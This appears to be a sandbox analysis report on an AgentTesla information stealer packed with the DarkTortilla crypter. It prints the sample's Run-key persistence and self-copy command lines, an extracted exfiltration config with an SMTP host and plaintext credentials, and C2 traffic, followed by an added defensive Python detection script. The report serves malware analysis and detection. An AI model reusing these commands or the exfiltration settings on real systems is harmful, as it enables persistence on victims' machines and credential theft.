
Windows Analysis Report
image.exe

Overview

General Information

Sample name: image.exe
Analysis ID: 1492221
MD5: 043b9d0de6bad8fc4b4722987348329e
SHA1: 6a344981c065f19b15736a0ed7afe92da6ef3cc0
SHA256: 466b1cf9bae2d35d18dd3c8c9944861d770bf0dda89bb535d5566f12d7ccd11d
Tags: exe

Detection

Malware family: AgentTesla, DarkTortilla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
.NET source code contains very large array initializations
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates multiple autostart registry keys
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • image.exe (PID: 5024 cmdline: "C:\Users\user\Desktop\image.exe" MD5: 043B9D0DE6BAD8FC4B4722987348329E)
    • cmd.exe (PID: 5368 cmdline: "cmd" /c ping 127.0.0.1 -n 16 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 2268 cmdline: ping 127.0.0.1 -n 16 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • reg.exe (PID: 3976 cmdline: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • cmd.exe (PID: 4788 cmdline: "cmd" /c ping 127.0.0.1 -n 28 > nul && copy "C:\Users\user\Desktop\image.exe" "C:\Users\user\AppData\Roaming\ACID.exe" && ping 127.0.0.1 -n 28 > nul && "C:\Users\user\AppData\Roaming\ACID.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 3640 cmdline: ping 127.0.0.1 -n 28 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • PING.EXE (PID: 3548 cmdline: ping 127.0.0.1 -n 28 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • ACID.exe (PID: 6900 cmdline: "C:\Users\user\AppData\Roaming\ACID.exe" MD5: 043B9D0DE6BAD8FC4B4722987348329E)
        • InstallUtil.exe (PID: 1112 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
        • watchdog.exe (PID: 4048 cmdline: "C:\Users\user\AppData\Local\Temp\watchdog.exe" MD5: 0E362E7005823D0BEC3719B902ED6D62)
          • watchdog.exe (PID: 1832 cmdline: "C:\Users\user\AppData\Local\Temp\watchdog.exe" MD5: 0E362E7005823D0BEC3719B902ED6D62)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: DarkTortilla
Description: DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging. From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla
Malware configuration (AgentTesla, extracted from 15.2.ACID.exe.6256fb8.5.raw.unpack): {"Exfil Mode": "SMTP", "Port": "587", "Host": "evdanco.ru", "Username": "oleg@evdanco.ru", "Password": "[xkgyDSlzA(_"}
Yara matches in memory dumps (Source | Rule | Description | Author; 32 entries in the full report, first 5 shown):
  • 0000000F.00000002.3465569554.00000000040B7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security
  • 0000000F.00000002.3465569554.00000000040B7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
  • 0000000F.00000002.3465569554.00000000040B7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
  • 00000010.00000002.3445933830.00000000030DD000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
  • 0000000F.00000002.3465569554.0000000004002000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

Yara matches in unpacked PE files (Source | Rule | Description | Author; 77 entries in the full report, first 5 shown):
  • 0.2.image.exe.3c8a281.3.raw.unpack | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security
  • 0.2.image.exe.3c8a281.3.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
  • 0.2.image.exe.3c8a281.3.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
  • 0.2.image.exe.3c8a281.3.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
  • 0.2.image.exe.3c8a281.3.raw.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
    Matched strings (each Windows vault schema GUID occurs at three offsets, i.e. the stealer module is embedded three times in the unpacked image):
    • $s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 at 0x4a1a9, 0x9f999, 0x1055f9
    • $s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 at 0x4a21b, 0x9fa0b, 0x10566b
    • $s3: 154E23D0-C644-4E6F-8CE6-5069272F999F at 0x4a2a5, 0x9fa95, 0x1056f5
    • $s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 at 0x4a337, 0x9fb27, 0x105787
    • $s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 at 0x4a3a1, 0x9fb91, 0x1057f1
    • $s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC at 0x4a413, 0x9fc03, 0x105863
    • $s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B at 0x4a4a9, 0x9fc99, 0x1058f9

                    System Summary

Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\ACID.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 3976, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ACID
Source: Process started | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community | Data: Command: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe", CommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "cmd" /c ping 127.0.0.1 -n 16 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5368, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe", ProcessId: 3976, ProcessName: reg.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "cmd" /c ping 127.0.0.1 -n 16 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe", CommandLine: "cmd" /c ping 127.0.0.1 -n 16 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe", CommandLine|base64offset|contains: (empty), Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\image.exe", ParentImage: C:\Users\user\Desktop\image.exe, ParentProcessId: 5024, ParentProcessName: image.exe, ProcessCommandLine: "cmd" /c ping 127.0.0.1 -n 16 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe", ProcessId: 5368, ProcessName: cmd.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 80.96.42.133, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 1112, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49729
                    No Suricata rule has matched
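The Sigma hits above and the process tree describe one sequence: cmd.exe sleeps with ping -n 16 against loopback, reg.exe writes a Run value pointing at a copy of the sample under AppData\Roaming, and the payload running inside InstallUtil.exe resolves ip-api.com / api.ipify.org and opens TCP 587 to the SMTP host from the extracted config. The Python below is an added example of turning those observations into host-side detection logic; it is not Joe Sandbox or Sigma code. It runs over constructed Sysmon-style events modelled on the report's process tree (not exported sandbox telemetry); the field names follow Sysmon conventions, the rule names and helper names are the example's own, and the two .NET host binaries listed next to InstallUtil.exe (RegSvcs.exe, RegAsm.exe) are an assumption from general AgentTesla experience, not something this report shows.

```python
"""Added example: detection logic for the behaviours recorded in this report,
run over constructed Sysmon-style events (not sandbox telemetry)."""
import re

# Constructed events (EventID 1 = process create, 3 = network connect,
# 13 = registry value set, 22 = DNS query), built from the report's process tree.
EVENTS = [
    {"EventID": 1, "ProcessId": 5368, "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "ParentImage": r"C:\Users\user\Desktop\image.exe",
     "CommandLine": r'"cmd" /c ping 127.0.0.1 -n 16 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe"'},
    {"EventID": 13, "ProcessId": 3976, "Image": r"C:\Windows\SysWOW64\reg.exe",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ACID",
     "Details": r"C:\Users\user\AppData\Roaming\ACID.exe"},
    {"EventID": 22, "ProcessId": 1112,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "QueryName": "ip-api.com"},
    {"EventID": 3, "ProcessId": 1112,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "DestinationIp": "80.96.42.133", "DestinationPort": 587},
    # Benign control: a short ping with nothing chained behind it.
    {"EventID": 1, "ProcessId": 7000, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"cmd" /c ping 127.0.0.1 -n 1 > nul'},
]

PING_SLEEP = re.compile(r"ping(?:\.exe)?\s+127\.0\.0\.1\s+-n\s+(\d+)", re.I)
# Matches HKCU and HKLM Run and RunOnce keys alike.
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?\b", re.I)
USER_WRITABLE = re.compile(r"\\(?:AppData|ProgramData|Temp)\\", re.I)
# Assumption: the report only shows InstallUtil.exe as the hollowed host;
# RegSvcs.exe and RegAsm.exe are added from general AgentTesla experience.
DOTNET_HOSTS = {"installutil.exe", "regsvcs.exe", "regasm.exe"}
SMTP_PORTS = {25, 465, 587}
IP_LOOKUP_DOMAINS = {"ip-api.com", "api.ipify.org"}  # both queried in the report


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, pid, detail) tuples for every event that matches a rule."""
    alerts = []
    for ev in events:
        eid, pid, img = ev["EventID"], ev["ProcessId"], basename(ev.get("Image", ""))
        if eid == 1:
            cl = ev.get("CommandLine", "")
            m = PING_SLEEP.search(cl)
            if m and RUN_KEY.search(cl):
                # ping -n N to loopback is a roughly N-second sleep; chained with a
                # Run-key write it is the exact persistence step in the process tree.
                alerts.append(("ping_sleep_then_run_key", pid, f"sleep~{m.group(1)}s"))
            elif m and int(m.group(1)) >= 10 and "&&" in cl:
                alerts.append(("ping_sleep_chain", pid, f"sleep~{m.group(1)}s"))
        elif eid == 13:
            if RUN_KEY.search(ev.get("TargetObject", "")) and USER_WRITABLE.search(ev.get("Details", "")):
                alerts.append(("run_key_to_user_writable_path", pid, ev["Details"]))
        elif eid == 22:
            # Public-IP / hosting lookup from a .NET utility that has no reason to do it.
            if ev.get("QueryName", "").lower() in IP_LOOKUP_DOMAINS and img in DOTNET_HOSTS:
                alerts.append(("dotnet_host_public_ip_lookup", pid, ev["QueryName"]))
        elif eid == 3:
            if img in DOTNET_HOSTS and int(ev.get("DestinationPort", 0)) in SMTP_PORTS:
                alerts.append(("dotnet_host_smtp_egress", pid,
                               f'{ev["DestinationIp"]}:{ev["DestinationPort"]}'))
    return alerts


if __name__ == "__main__":
    for rule, pid, detail in detect(EVENTS):
        print(f"{rule:32s} pid={pid} {detail}")
```

Run as a script it prints four alerts, one per stage of the chain; the `ping -n 1` control event produces none. The ping threshold (10 echoes) and the user-writable path list are the knobs that need tuning per environment, and the SMTP rule should be scoped to processes that are not the organisation's mail clients rather than widened to every port-587 connection.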


                    AV Detection

Source: http://evdanco.ru | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\watchdog.exe | Avira: detection malicious, Label: TR/Agent.able
Source: 15.2.ACID.exe.6256fb8.5.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "evdanco.ru", "Username": "oleg@evdanco.ru", "Password": "[xkgyDSlzA(_"}
Source: C:\Users\user\AppData\Local\Temp\watchdog.exe | ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Roaming\ACID.exe | ReversingLabs: Detection: 34%
Source: image.exe | ReversingLabs: Detection: 34%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\ACID.exe | Joe Sandbox ML: detected
Source: image.exe | Joe Sandbox ML: detected
Source: image.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: image.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll | source: VsUPptm.exe.16.dr
Source: Binary string: InstallUtil.pdb | source: VsUPptm.exe.16.dr
Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb | source: ACID.exe, 0000000F.00000002.3441640640.00000000011EC000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\watchdog.exe | Code function: 4x nop then jmp 022B0B9Fh (18_2_022B0960)
Source: C:\Users\user\AppData\Local\Temp\watchdog.exe | Code function: 4x nop then jmp 022B0B9Fh (18_2_022B094F)
Source: C:\Users\user\AppData\Local\Temp\watchdog.exe | Code function: 4x nop then jmp 01120B9Fh (19_2_01120960)
Source: C:\Users\user\AppData\Local\Temp\watchdog.exe | Code function: 4x nop then jmp 01120B9Fh (19_2_0112094F)

                    Networking

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 16
Source: Yara match | File source: 0.2.image.exe.3c8a281.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.615681a.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.61435a9.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.6243d59.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.image.exe.3e03900.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.6256fb8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.410d662.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.62017da.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.image.exe.3c9d502.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.image.exe.3c47d02.2.raw.unpack, type: UNPACKEDPE
Source: global traffic | TCP traffic: 192.168.2.6:49729 -> 80.96.42.133:587 (listed twice in the report)
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive (listed twice in the report; no User-Agent header)
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | IP Address: 104.26.13.205 (listed twice in the report)
Source: Joe Sandbox View | ASN Name: TUT-ASUS
Source: Joe Sandbox View | ASN Name: RCS-RDS73-75DrStaicoviciRO
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: api.ipify.org (listed twice in the report)
Source: unknown | DNS query: name: ip-api.com
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive (listed twice in the report)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (3 occurrences)
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: evdanco.ru
Source: InstallUtil.exe, 00000010.00000002.3445933830.00000000030DD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://evdanco.ru
Source: InstallUtil.exe, 00000010.00000002.3445933830.00000000030A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
Source: image.exe, 00000000.00000002.2381424408.0000000003E03000.00000004.00000800.00020000.00000000.sdmp, image.exe, 00000000.00000002.2381424408.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3465569554.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3465569554.0000000004002000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3471337027.0000000006101000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3471337027.0000000006201000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.3440435201.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.3445933830.00000000030A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: ACID.exe, 0000000F.00000002.3477111362.0000000007D18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://purl.oen
Source: InstallUtil.exe, 00000010.00000002.3445933830.0000000003051000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: image.exe, 00000000.00000002.2381424408.0000000003E03000.00000004.00000800.00020000.00000000.sdmp, image.exe, 00000000.00000002.2381424408.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3465569554.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3465569554.0000000004002000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3471337027.0000000006101000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3471337027.0000000006201000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.3440435201.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
Source: image.exe, 00000000.00000002.2381424408.0000000003E03000.00000004.00000800.00020000.00000000.sdmp, image.exe, 00000000.00000002.2381424408.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3465569554.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3465569554.0000000004002000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3471337027.0000000006101000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3471337027.0000000006201000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.3445933830.0000000003051000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.3440435201.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
Source: InstallUtil.exe, 00000010.00000002.3445933830.0000000003051000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
Source: InstallUtil.exe, 00000010.00000002.3445933830.0000000003051000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/t
Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown | HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49727 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.image.exe.3c47d02.2.raw.unpack, gmBpn1ecBmQ.cs | .Net Code: KItL3kLLp
Source: 0.2.image.exe.3c9d502.6.raw.unpack, gmBpn1ecBmQ.cs | .Net Code: KItL3kLLp
Source: 0.2.image.exe.3e03900.4.raw.unpack, gmBpn1ecBmQ.cs | .Net Code: KItL3kLLp

                    System Summary

Source: 0.2.image.exe.3c8a281.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 15.2.ACID.exe.615681a.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 15.2.ACID.exe.61435a9.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 15.2.ACID.exe.615681a.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 15.2.ACID.exe.6243d59.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.image.exe.3e03900.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 15.2.ACID.exe.6256fb8.5.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.image.exe.3c47d02.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.image.exe.3e03900.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.image.exe.3c9d502.6.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 15.2.ACID.exe.62017da.8.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 15.2.ACID.exe.6256fb8.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 15.2.ACID.exe.410d662.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 15.2.ACID.exe.410d662.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 15.2.ACID.exe.62017da.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.image.exe.3c9d502.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.image.exe.3c47d02.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: image.exe, o7KEd9.cs | Large array initialization: o7KEd9: array initializer size 2194
Source: ACID.exe.7.dr, o7KEd9.cs | Large array initialization: o7KEd9: array initializer size 2194
Source: initial sample | Static PE information: Filename: image.exe
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_08526F78 CreateProcessAsUserW
Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_01138331
Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_011375A0
Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_04BD4D77
Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_051208C9
Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_051276E1
Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_09700848
Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_09700844
Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_0970C1B8
Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_0970A770
Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_097280B8
